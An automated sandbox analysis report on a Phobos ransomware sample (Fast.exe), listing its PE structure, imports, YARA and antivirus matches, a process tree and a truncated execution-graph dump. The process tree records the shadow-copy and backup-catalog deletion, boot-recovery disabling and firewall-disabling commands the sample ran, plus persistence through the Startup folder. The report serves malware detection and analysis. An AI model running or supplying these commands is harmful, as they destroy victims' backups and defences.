    • [IMP] VS2008 SP1 build 30729
    • [ASM] VS2010 SP1 build 40219
    • [ C ] VS2010 SP1 build 40219
    • [LNK] VS2010 SP1 build 40219
    Name | Virtual Address | Virtual Size | Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa434 | 0xc8 | .rdata
    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe000 | 0x4a4 | .reloc
    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_IAT | 0xa000 | 0x1e0 | .rdata
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
    .text | 0x1000 | 0x8598 | 0x8600 | a491c4d91a4b5889442e891da7aad09f | False | 0.6207439365671642 | data | 6.587550210952109 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    .rdata | 0xa000 | 0xe7c | 0x1000 | a73fadb324bbeec4e8315214d839bd02 | False | 0.488037109375 | data | 5.2778312416346775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .data | 0xb000 | 0x26b9 | 0x600 | 9fbb7c1ef86e2afdf0d2401013aa3bcc | False | 0.7317708333333334 | data | 6.177543517657492 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    .reloc | 0xe000 | 0x5ee | 0x600 | 63531957a01468434c794b6b08c13046 | False | 0.7076822916666666 | data | 5.696126590216012 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
    .cdata | 0xf000 | 0x3708 | 0x3800 | 95155902cd30c80dca70cc3185b13c83 | False | 0.9224330357142857 | data | 7.835200976730417 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    DLL | Import
    MPR.dll | WNetEnumResourceW, WNetUseConnectionW, WNetOpenEnumW, WNetCloseEnum
    WS2_32.dll | ioctlsocket, getpeername, ntohl, select, WSAGetLastError, htons, recv, socket, closesocket, getsockopt, WSAAddressToStringW, htonl, connect
    IPHLPAPI.DLL | GetIpAddrTable
    WINHTTP.dll | WinHttpReceiveResponse, WinHttpOpenRequest, WinHttpConnect, WinHttpCloseHandle, WinHttpOpen, WinHttpSendRequest
    KERNEL32.dll | FindClose, FindNextFileW, SystemTimeToFileTime, OpenProcess, FindFirstFileW, MoveFileW, GetFileSizeEx, SetFilePointerEx, SetEndOfFile, GetCurrentThreadId, GetLocalTime, ExitProcess, SetFilePointer, WaitForSingleObject, GetComputerNameW, SetEvent, GetLogicalDrives, GetTickCount, Sleep, CopyFileW, GetFileAttributesW, ReadFile, CreateFileW, MultiByteToWideChar, CreateEventW, WaitForMultipleObjects, CloseHandle, SetFileAttributesW, CreateThread, InitializeCriticalSectionAndSpinCount, LeaveCriticalSection, EnterCriticalSection, ResetEvent, DeleteCriticalSection, AllocConsole, WriteFile, WideCharToMultiByte, WriteConsoleW, GetStdHandle, CreateMutexW, CreateProcessW, GetCurrentProcess, SetHandleInformation, HeapFree, GetLocaleInfoW, ReadProcessMemory, TerminateProcess, GetModuleFileNameW, FlushFileBuffers, OpenMutexW, GetLastError, GetProcAddress, Process32FirstW, GetExitCodeThread, CreatePipe, Process32NextW, GetModuleHandleA, CreateToolhelp32Snapshot, ReleaseMutex, GetVersion, DeleteFileW, GetCurrentProcessId, GetVolumeInformationW, ExpandEnvironmentStringsW, HeapAlloc, GetProcessHeap, HeapReAlloc, QueryPerformanceCounter
    USER32.dll | GetWindowThreadProcessId, GetShellWindow
    ADVAPI32.dll | FreeSid, LookupPrivilegeValueW, OpenProcessToken, GetTokenInformation, EqualSid, RegSetValueExW, RegCloseKey, AdjustTokenPrivileges, RegOpenKeyExW, LookupAccountSidW, AllocateAndInitializeSid, DuplicateTokenEx, RegQueryValueExW
    SHELL32.dll | ShellExecuteExW
    ole32.dll | CoGetObject, CoInitializeEx, CoUninitialize
    No network behavior found

    Target ID:0
    Start time:16:11:09
    Start date:07/02/2024
    Path:C:\Users\user\Desktop\Fast.exe
    Wow64 process (32bit):true
    Commandline:C:\Users\user\Desktop\Fast.exe
    Imagebase:0xca0000
    File size:56'832 bytes
    MD5 hash:EA6D3083F8C1C506FBFF457BF09A7ED8
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Yara matches:
    • Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Source: 00000000.00000000.1776137882.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
    Reputation:low
    Has exited:false

    Target ID:2
    Start time:16:11:09
    Start date:07/02/2024
    Path:C:\Users\user\Desktop\Fast.exe
    Wow64 process (32bit):true
    Commandline:C:\Users\user\Desktop\Fast.exe
    Imagebase:0xca0000
    File size:56'832 bytes
    MD5 hash:EA6D3083F8C1C506FBFF457BF09A7ED8
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Yara matches:
    • Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Source: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
    • Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Source: 00000002.00000003.1779252416.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Source: 00000002.00000000.1778560416.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
    Reputation:low
    Has exited:false

    Target ID:3
    Start time:16:11:14
    Start date:07/02/2024
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\cmd.exe
    Imagebase:0x7ff778f60000
    File size:289'792 bytes
    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:4
    Start time:16:11:14
    Start date:07/02/2024
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\cmd.exe
    Imagebase:0x7ff778f60000
    File size:289'792 bytes
    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:5
    Start time:16:11:14
    Start date:07/02/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff7699e0000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:6
    Start time:16:11:14
    Start date:07/02/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff7699e0000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:7
    Start time:16:11:17
    Start date:07/02/2024
    Path:C:\Windows\System32\vssadmin.exe
    Wow64 process (32bit):false
    Commandline:vssadmin delete shadows /all /quiet
    Imagebase:0x7ff63b540000
    File size:145'920 bytes
    MD5 hash:B58073DB8892B67A672906C9358020EC
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    Target ID:8
    Start time:16:11:17
    Start date:07/02/2024
    Path:C:\Windows\System32\netsh.exe
    Wow64 process (32bit):false
    Commandline:netsh advfirewall set currentprofile state off
    Imagebase:0x7ff72d2e0000
    File size:96'768 bytes
    MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    Target ID:10
    Start time:16:11:21
    Start date:07/02/2024
    Path:C:\Windows\System32\netsh.exe
    Wow64 process (32bit):false
    Commandline:netsh firewall set opmode mode=disable
    Imagebase:0x7ff72d2e0000
    File size:96'768 bytes
    MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    Target ID:14
    Start time:16:11:26
    Start date:07/02/2024
    Path:C:\Users\user\AppData\Local\Fast.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\AppData\Local\Fast.exe"
    Imagebase:0xd0000
    File size:56'832 bytes
    MD5 hash:EA6D3083F8C1C506FBFF457BF09A7ED8
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Yara matches:
    • Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Source: 0000000E.00000000.1940315719.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Author: unknown
    • Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Source: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Author: unknown
    Antivirus matches:
    • Detection: 89%, ReversingLabs
    Reputation:low
    Has exited:true

    Target ID:16
    Start time:16:11:28
    Start date:07/02/2024
    Path:C:\Windows\System32\wbem\WMIC.exe
    Wow64 process (32bit):false
    Commandline:wmic shadowcopy delete
    Imagebase:0x7ff777a20000
    File size:576'000 bytes
    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    Target ID:17
    Start time:16:11:34
    Start date:07/02/2024
    Path:C:\Users\user\AppData\Local\Fast.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\AppData\Local\Fast.exe"
    Imagebase:0xd0000
    File size:56'832 bytes
    MD5 hash:EA6D3083F8C1C506FBFF457BF09A7ED8
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Yara matches:
    • Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Source: 00000011.00000000.2019602481.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Author: unknown
    • Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Source: 00000011.00000002.2024695997.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Author: unknown
    Reputation:low
    Has exited:true

    Target ID:18
    Start time:16:11:44
    Start date:07/02/2024
    Path:C:\Windows\System32\bcdedit.exe
    Wow64 process (32bit):false
    Commandline:bcdedit /set {default} bootstatuspolicy ignoreallfailures
    Imagebase:0x7ff7918c0000
    File size:491'864 bytes
    MD5 hash:74F7B84B0A547592CA63A00A8C4AD583
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    Target ID:19
    Start time:16:11:44
    Start date:07/02/2024
    Path:C:\Users\user\AppData\Local\Fast.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\AppData\Local\Fast.exe"
    Imagebase:0xd0000
    File size:56'832 bytes
    MD5 hash:EA6D3083F8C1C506FBFF457BF09A7ED8
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Yara matches:
    • Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Source: 00000013.00000002.2135391960.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Author: unknown
    • Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Source: 00000013.00000000.2125457686.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Author: unknown
    Reputation:low
    Has exited:true

    Target ID:20
    Start time:16:11:47
    Start date:07/02/2024
    Path:C:\Windows\System32\bcdedit.exe
    Wow64 process (32bit):false
    Commandline:bcdedit /set {default} recoveryenabled no
    Imagebase:0x7ff7918c0000
    File size:491'864 bytes
    MD5 hash:74F7B84B0A547592CA63A00A8C4AD583
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    Target ID:21
    Start time:16:11:50
    Start date:07/02/2024
    Path:C:\Windows\System32\wbadmin.exe
    Wow64 process (32bit):false
    Commandline:wbadmin delete catalog -quiet
    Imagebase:0x7ff63e1c0000
    File size:329'728 bytes
    MD5 hash:F2AA55885A2C014DA99F1355F3F71E4A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    Target ID:22
    Start time:16:11:51
    Start date:07/02/2024
    Path:C:\Windows\System32\wbengine.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\wbengine.exe
    Imagebase:0x7ff670b20000
    File size:1'585'152 bytes
    MD5 hash:17270A354A66590953C4AAC1CF54E507
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:false

    Target ID:23
    Start time:16:11:52
    Start date:07/02/2024
    Path:C:\Windows\System32\vdsldr.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\System32\vdsldr.exe -Embedding
    Imagebase:0x7ff666bb0000
    File size:27'136 bytes
    MD5 hash:472A05A6ADC167E9E5D2328AD98E3067
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:true

    Target ID:24
    Start time:16:11:52
    Start date:07/02/2024
    Path:C:\Windows\System32\vds.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\System32\vds.exe
    Imagebase:0x7ff699200000
    File size:723'968 bytes
    MD5 hash:0781CE7ECCD9F6318BA72CD96B5B8992
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:false

    Target ID:25
    Start time:16:11:54
    Start date:07/02/2024
    Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe"
    Imagebase:0x200000
    File size:56'832 bytes
    MD5 hash:EA6D3083F8C1C506FBFF457BF09A7ED8
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Yara matches:
    • Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Source: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
    • Rule: Windows_Ransomware_Phobos_11ea7be5, Description: Identifies Phobos ransomware, Source: 00000019.00000000.2225352024.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
    Antivirus matches:
    • Detection: 89%, ReversingLabs
    Has exited:true

      Execution Graph

      Execution Coverage:17.6%
      Dynamic/Decrypted Code Coverage:0%
      Signature Coverage:18.7%
      Total number of Nodes:1300
      Total number of Limit Nodes:21
      execution_graph 4955 ca34eb 4956 ca3509 4955->4956 4961 ca3577 4955->4961 4957 ca354b 4956->4957 4958 ca3539 ResetEvent SetEvent 4956->4958 4956->4961 4959 ca3566 4957->4959 4963 ca31c3 4957->4963 4958->4957 4960 ca356d SetEvent 4959->4960 4959->4961 4960->4961 4964 ca31d9 4963->4964 4965 ca31ce 4963->4965 4976 ca313f 4964->4976 4969 ca30af 4965->4969 4968 ca31d6 4968->4959 4970 ca30bc 4969->4970 4975 ca30ca 4969->4975 4971 ca30cd 4970->4971 4972 ca30c4 4970->4972 4974 ca9041 2 API calls 4971->4974 4973 ca907a 2 API calls 4972->4973 4973->4975 4974->4975 4975->4968 4977 ca31a0 4976->4977 4978 ca3146 4976->4978 4977->4968 4978->4977 4979 ca907a 2 API calls 4978->4979 4979->4977 3677 ca3abe 3686 ca905b 3677->3686 3679 ca3ad2 3689 ca3a18 RegOpenKeyExW 3679->3689 3682 ca3b16 3684 ca3b2a 3682->3684 3694 ca90a1 GetProcessHeap RtlFreeHeap 3682->3694 3683 ca3a18 3 API calls 3683->3682 3687 ca9068 3686->3687 3688 ca9069 GetProcessHeap HeapAlloc 3686->3688 3687->3688 3688->3679 3690 ca3a4e RegQueryValueExW 3689->3690 3691 ca3a7f 3689->3691 3692 ca3a6a RegCloseKey 3690->3692 3691->3682 3691->3683 3692->3691 3694->3684 4980 ca8ebe CreateFileW 4981 ca8ee9 GetFileSizeEx 4980->4981 4982 ca8fa2 4980->4982 4983 ca8efc CloseHandle 4981->4983 4984 ca8f96 4981->4984 4983->4982 4985 ca8f1a GetFileAttributesW 4983->4985 4984->4982 4986 ca8f9b CloseHandle 4984->4986 4985->4982 4987 ca8f28 4985->4987 4986->4982 4988 ca8f3e 4987->4988 4989 ca8f37 SetFileAttributesW 4987->4989 4990 ca8f67 4988->4990 4991 ca8f53 4988->4991 4989->4988 5015 ca8782 4990->5015 4997 ca8c42 4991->4997 4994 ca8f65 4994->4982 4995 ca8f8c SetFileAttributesW 4994->4995 4996 ca8f93 SetFileAttributesW 4994->4996 4995->4982 4996->4984 4998 ca8c5c 4997->4998 4999 ca8eaa MoveFileW 4998->4999 5000 ca8ccd MoveFileW 4998->5000 5001 ca8eb6 4999->5001 5000->4999 5002 ca8ce1 CreateFileW 5000->5002 5001->4994 5002->4999 5003 ca8d03 5002->5003 5039 ca8b60 SetFilePointerEx 5003->5039 5005 ca8e9b CloseHandle 5005->4999 
5005->5001 5006 ca8d12 5006->5005 5007 ca8e15 SetFilePointerEx 5006->5007 5007->5005 5008 ca8e49 WriteFile 5007->5008 5008->5005 5009 ca8e63 5008->5009 5009->5005 5010 ca8e6e SetEndOfFile 5009->5010 5044 ca8af1 5010->5044 5013 ca8e8d FlushFileBuffers 5014 ca8e94 5013->5014 5014->5005 5016 ca87a9 5015->5016 5017 ca87e9 GetFileAttributesW 5016->5017 5018 ca8ae9 5017->5018 5019 ca8813 GetFileAttributesW 5017->5019 5018->4994 5019->5018 5020 ca8825 CreateFileW 5019->5020 5020->5018 5021 ca8847 SetFilePointerEx 5020->5021 5022 ca886a 5021->5022 5023 ca8ab9 CloseHandle 5021->5023 5022->5023 5024 ca8876 SetFilePointerEx 5022->5024 5025 ca8aca CloseHandle 5023->5025 5026 ca8acf 5023->5026 5024->5023 5027 ca889a CreateFileW 5024->5027 5025->5026 5026->5018 5028 ca8ae3 DeleteFileW 5026->5028 5027->5023 5030 ca88bf 5027->5030 5028->5018 5029 ca8957 ReadFile 5029->5030 5031 ca8974 5029->5031 5030->5023 5030->5029 5030->5031 5032 ca8929 WriteFile 5030->5032 5033 ca8979 5030->5033 5031->5023 5032->5030 5032->5031 5033->5031 5034 ca8a4d WriteFile 5033->5034 5034->5031 5035 ca8a6c 5034->5035 5035->5031 5036 ca8a85 5035->5036 5049 ca86b7 5035->5049 5036->5031 5038 ca8a8c FlushFileBuffers FlushFileBuffers 5036->5038 5038->5031 5041 ca8c31 5039->5041 5042 ca8b8a __aulldiv 5039->5042 5040 ca8bce SetFilePointerEx 5040->5041 5040->5042 5041->5006 5042->5040 5042->5041 5043 ca8bfd ReadFile 5042->5043 5043->5041 5043->5042 5048 ca8b0c 5044->5048 5045 ca8b0f SetFilePointerEx 5046 ca8b32 WriteFile 5045->5046 5047 ca8b52 5045->5047 5046->5047 5046->5048 5047->5013 5047->5014 5048->5045 5048->5047 5050 ca8fa9 5049->5050 5051 ca86d0 SetFilePointerEx 5050->5051 5052 ca86f4 SetFilePointerEx 5051->5052 5056 ca876c 5051->5056 5055 ca8719 5052->5055 5052->5056 5053 ca8757 WriteFile 5053->5056 5054 ca872a WriteFile 5054->5055 5054->5056 5055->5053 5055->5054 5055->5056 5056->5036 5057 ca1bbf 5058 ca530c 10 API calls 5057->5058 5059 ca1bd5 5058->5059 5060 ca3c7a 10 API calls 5059->5060 5061 ca1bdc 
5060->5061 5062 ca9041 2 API calls 5061->5062 5063 ca1bea 5062->5063 5064 ca3955 9 API calls 5063->5064 5079 ca1bfc 5064->5079 5065 ca1c99 5066 ca1ca3 5065->5066 5081 ca90a1 GetProcessHeap RtlFreeHeap 5065->5081 5069 ca3955 9 API calls 5066->5069 5067 ca1c94 5070 ca52de 5 API calls 5067->5070 5071 ca1cb0 5069->5071 5070->5065 5082 ca90a1 GetProcessHeap RtlFreeHeap 5071->5082 5073 ca1cb9 5074 ca1c8d 5075 ca542b WaitForSingleObject 5074->5075 5075->5067 5076 ca1706 22 API calls 5076->5079 5077 ca5840 49 API calls 5077->5079 5078 ca1c44 CloseHandle 5078->5079 5079->5065 5079->5067 5079->5074 5079->5076 5079->5077 5079->5078 5080 ca1c73 CloseHandle 5079->5080 5080->5079 5081->5066 5082->5073 5083 ca42bd 5084 ca42cf 5083->5084 5086 ca4313 5083->5086 5084->5086 5087 ca411d 5084->5087 5088 ca6347 2 API calls 5087->5088 5089 ca4136 5088->5089 5090 ca413e GetModuleHandleA GetProcAddress 5089->5090 5091 ca6347 2 API calls 5090->5091 5092 ca415f 5091->5092 5093 ca4183 CoGetObject 5092->5093 5094 ca41af 5092->5094 5093->5094 5095 ca39da 2 API calls 5094->5095 5096 ca426d 5095->5096 5097 ca39b7 2 API calls 5096->5097 5098 ca4277 5097->5098 5098->5086 5099 ca4281 5100 ca428e 5099->5100 5101 ca42aa 5099->5101 5100->5101 5102 ca411d 7 API calls 5100->5102 5102->5101 5103 ca56b1 5104 ca56b3 5103->5104 5140 ca32ff 5104->5140 5107 ca9041 2 API calls 5112 ca56d0 5107->5112 5108 ca57e0 5117 ca3955 9 API calls 5108->5117 5109 ca580a 5111 ca5814 5109->5111 5161 ca32a6 EnterCriticalSection DeleteCriticalSection 5109->5161 5110 ca57fd 5110->5109 5160 ca90a1 GetProcessHeap RtlFreeHeap 5110->5160 5174 ca53e5 EnterCriticalSection 5111->5174 5112->5108 5112->5110 5118 ca3955 9 API calls 5112->5118 5116 ca581c 5180 ca90a1 GetProcessHeap RtlFreeHeap 5116->5180 5117->5110 5119 ca571d 5118->5119 5120 ca3d4b 6 API calls 5119->5120 5122 ca572a 5120->5122 5124 ca5735 CreateThread 5122->5124 5126 ca575a 5122->5126 5123 ca582d 5181 ca90a1 GetProcessHeap RtlFreeHeap 5123->5181 5124->5122 5124->5126 5128 
ca578b 5126->5128 5129 ca5d61 7 API calls 5126->5129 5127 ca5834 5157 ca5962 EnterCriticalSection LeaveCriticalSection 5128->5157 5129->5128 5131 ca5796 5132 ca579f WaitForSingleObject 5131->5132 5158 ca33c5 EnterCriticalSection SetEvent SetEvent SetEvent LeaveCriticalSection 5131->5158 5159 ca33c5 EnterCriticalSection SetEvent SetEvent SetEvent LeaveCriticalSection 5132->5159 5135 ca57af WaitForMultipleObjects 5136 ca57c1 5135->5136 5137 ca57d5 5136->5137 5138 ca57ca CloseHandle 5136->5138 5139 ca3d4b 6 API calls 5137->5139 5138->5136 5139->5108 5141 ca9041 2 API calls 5140->5141 5142 ca3308 5141->5142 5143 ca3315 InitializeCriticalSectionAndSpinCount 5142->5143 5149 ca33b5 5142->5149 5144 ca332c 5143->5144 5145 ca33b7 5143->5145 5146 ca9041 2 API calls 5144->5146 5182 ca90a1 GetProcessHeap RtlFreeHeap 5145->5182 5148 ca3344 CreateEventW CreateEventW CreateEventW 5146->5148 5151 ca3391 5148->5151 5149->5107 5152 ca32a6 7 API calls 5151->5152 5153 ca339f 5151->5153 5152->5153 5154 ca31c3 4 API calls 5153->5154 5155 ca33ac 5154->5155 5155->5149 5156 ca32a6 7 API calls 5155->5156 5156->5149 5157->5131 5158->5132 5159->5135 5160->5109 5162 ca32c7 5161->5162 5163 ca32c4 CloseHandle 5161->5163 5164 ca32ce CloseHandle 5162->5164 5165 ca32d1 5162->5165 5163->5162 5164->5165 5166 ca32d8 CloseHandle 5165->5166 5168 ca32db 5165->5168 5166->5168 5167 ca32f5 5185 ca90a1 GetProcessHeap RtlFreeHeap 5167->5185 5168->5167 5169 ca32ee 5168->5169 5183 ca90a1 GetProcessHeap RtlFreeHeap 5168->5183 5184 ca90a1 GetProcessHeap RtlFreeHeap 5169->5184 5171 ca32fc 5171->5111 5175 ca540f 5174->5175 5176 ca5401 SetEvent 5174->5176 5177 ca540a LeaveCriticalSection 5175->5177 5178 ca5413 SetEvent 5175->5178 5176->5175 5176->5177 5177->5116 5178->5177 5180->5123 5181->5127 5182->5149 5183->5169 5184->5167 5185->5171 3695 ca2fa7 3698 ca29f5 3695->3698 3699 ca2f9e ExitProcess 3698->3699 3700 ca2a47 3698->3700 3700->3699 3836 ca62a6 3700->3836 3702 ca2a6f 3702->3699 3845 ca6347 3702->3845 3704 
ca2a8c GetTickCount 3705 ca2aa0 3704->3705 3706 ca2aa6 GetLocaleInfoW 3705->3706 3707 ca2abe 3705->3707 3706->3707 3710 ca2ef0 3707->3710 3849 ca2876 3707->3849 3709 ca2add 3711 ca6347 2 API calls 3709->3711 3712 ca2efd 3710->3712 4236 ca597e EnterCriticalSection DeleteCriticalSection 3710->4236 3713 ca2ae5 3711->3713 3717 ca2f0e 3712->3717 3720 ca597e 4 API calls 3712->3720 3715 ca2b01 3713->3715 3861 ca271b 3713->3861 3890 ca39da 3715->3890 3721 ca2f12 EnterCriticalSection 3717->3721 3722 ca2f44 3717->3722 3720->3717 3726 ca2f28 3721->3726 3727 ca2f21 CloseHandle 3721->3727 3725 ca2876 2 API calls 3722->3725 3730 ca2f4e 3725->3730 3731 ca2f30 CloseHandle 3726->3731 3732 ca2f37 DeleteCriticalSection 3726->3732 3727->3726 3728 ca2876 2 API calls 3728->3715 4240 ca39b7 3730->4240 3731->3732 4239 ca90a1 GetProcessHeap RtlFreeHeap 3732->4239 3737 ca2f6a 3740 ca2f79 3737->3740 3742 ca1870 2 API calls 3737->3742 3743 ca2f7f ReleaseMutex CloseHandle 3740->3743 3744 ca2f93 3740->3744 3742->3740 3743->3744 4252 ca6274 3744->4252 3749 ca5930 5 API calls 3750 ca2b54 3749->3750 3750->3710 3751 ca2b6e 3750->3751 3752 ca2be6 3750->3752 3753 ca4ea5 14 API calls 3751->3753 3941 ca4ea5 3752->3941 3755 ca2b75 3753->3755 3755->3710 3760 ca4f7a 16 API calls 3755->3760 3757 ca2c62 3759 ca2c98 3757->3759 3958 ca4f7a 3757->3958 3758 ca2bf1 3761 ca4f7a 16 API calls 3758->3761 4054 ca4dbe 3759->4054 3763 ca2b84 3760->3763 3765 ca2bf8 3761->3765 3767 ca2ba3 3763->3767 3772 ca2b8f 3763->3772 3765->3710 3769 ca2c1d 3765->3769 3776 ca2c10 3765->3776 3773 ca2bbf 3767->3773 3781 ca4dbe 28 API calls 3767->3781 3769->3710 3784 ca2c15 3769->3784 3770 ca2be0 3770->3759 3963 ca2946 3770->3963 3771 ca2c74 4177 ca489e 3771->4177 4114 ca49d3 3772->4114 3773->3770 3790 ca4dbe 28 API calls 3773->3790 3774 ca2ccc 4063 ca3c7a 3774->4063 3775 ca2cac 3780 ca3c7a 10 API calls 3775->3780 4147 ca242f CreateEventW 3776->4147 3788 ca2cbc 3780->3788 3781->3773 3784->3710 3784->3769 4158 ca4944 GetVersion 
3784->4158 3795 ca1894 10 API calls 3788->3795 3789 ca2c7d Sleep 3789->3770 3790->3770 3794 ca2b98 Sleep 3794->3767 3799 ca2cc4 3795->3799 3796 ca2c38 3796->3710 3801 ca4f7a 16 API calls 3796->3801 3805 ca2c51 Sleep 3796->3805 3799->3710 4109 ca24c2 3799->4109 3800 ca3c7a 10 API calls 3802 ca2cf8 3800->3802 3801->3796 3803 ca1894 10 API calls 3802->3803 3803->3799 3805->3796 3807 ca2c5d 3805->3807 3806 ca2d24 3808 ca2e17 3806->3808 3809 ca2d47 CreateThread 3806->3809 3807->3710 3810 ca24c2 121 API calls 3808->3810 3811 ca2d6a 3809->3811 3812 ca2ed5 3809->3812 4943 ca239a 3809->4943 3814 ca2e02 3810->3814 3815 ca2d90 3811->3815 3817 ca24c2 121 API calls 3811->3817 3812->3710 3813 ca2edb CloseHandle 3812->3813 3813->3812 3819 ca2e4b 3814->3819 3820 ca2e3f WaitForSingleObject 3814->3820 3818 ca24c2 121 API calls 3815->3818 3817->3815 3821 ca2dbb 3818->3821 4191 ca5962 EnterCriticalSection LeaveCriticalSection 3819->4191 3820->3819 3823 ca24c2 121 API calls 3821->3823 3825 ca2de6 3823->3825 3824 ca2e54 3826 ca2e96 3824->3826 3832 